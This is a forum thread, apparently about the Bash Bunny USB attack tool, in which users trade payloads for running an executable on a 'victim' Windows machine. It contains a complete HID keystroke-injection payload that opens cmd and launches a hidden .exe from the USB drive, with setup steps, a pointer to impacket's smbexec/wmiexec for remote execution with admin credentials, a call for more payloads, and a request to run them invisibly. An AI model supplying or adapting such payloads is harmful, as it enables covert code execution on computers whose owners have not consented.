Running executable from BB Storage

[hoppler]

Hello.

I have following payload:

LED SETUP
ATTACKMODE HID STORAGE

GET SWITCH_POSITION

LED ATTACK

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.txt" ]; then
        QUACK ${SWITCH_POSITION}/my_script.txt
        LED FINISH
fi

Well, my_script.txt get's executed. Great.

But now my question:

Why it is'nt working if I change "my_script.txt" to "my_script.exe".

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.exe" ]; then
        QUACK ${SWITCH_POSITION}/my_script.exe
        LED FINISH
fi

Or is there a nother easy way to execute the .exe file without going through powershell or cmd?

Maybe through Ethernet???

An example or actually an answer would be great.

Maybe Darren could help???

Thanks in advance

 

[PoSHMagiC0de]

Negative.  For the victim to execute the exe, it will have to be ran by the victim.  That means you have to type it out the command to run it with Quack or have it ran inside a batch, cmd or powershell console.

If you know the password of the machine, know firewall for SMB or WMI is done and the AccountTokenFilterPolicy is set to 1 or the machine is on a domain and the account has admin you could use impackets. smbexec.py or wmiexec.py to do it but you will need admin creds to use.

What you were doing above is trying to type out the exe.  Quack doesn't run, it types.  The txt works because it is a text file so it just typed it out.  The exe will not or if it does it will be a bunch of binary data being typed out.

 

So, network way requires admin credentials if you do not want to type out a stager.

 

[hoppler]

Wow, thank you for this straight answer. Now I get the picture.

But I figured out a way to run an executable through command - even without admin rights.

Maybe somebody could use it.

Here is my solution:

Note: if you need different keyboard layout, add this: DUCKY_LANG gb - or anything else

Payload.txt:

ATTACKMODE HID STORAGE

LED R SLOW

Q GUI r
Q DELAY 500
Q STRING cmd
Q ENTER

Q DELAY 500
Q STRING "for /l %a in (0) do ( for %a in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %a:/my_folder/my.exe (start %a:/my_folder/my.exe   & exit) )"
Q ENTER

LED OFF

 

Weel, it's actually very simple - which runs on any Windows Machine.

How does it work?

1. Create a folder on the BB Storage or any other Storage with the Name: my_folder (you can name it like you want)

2. Put an executable File in the above folder (e.g. my.exe).

3. Copy the above Code into the payload.txt of switch 1 or switch 2.

4. Thats's all.

As soon as you insert the BB it starts the HID Attack. The BB opens a cmd window and runs an infinty loop searching the file.

If the the file exists it executes the exe file and exits the cmd window.

Simple but effective.

 

Ok, that's one way to achive my goal, running an executable from an external storage.

But now I would like to know how you guys would run an executable from the BB.

Any attack mode is allowed - so please give me your ideas and payloads.

It would be great if OS starts from Windows XP on, but from Windows 7 on is fine, too.

Let's make a challenge out of this!

Because Many people, many toughts, results in many solutions.

Hope you guys have a great day!!!

 

[Zwite]

The file explorer keeps popping up after i try running the payload on switch 1.

I can't figure out a way to make it stop doing that. Also is there a way to make it run it's payload invisibly?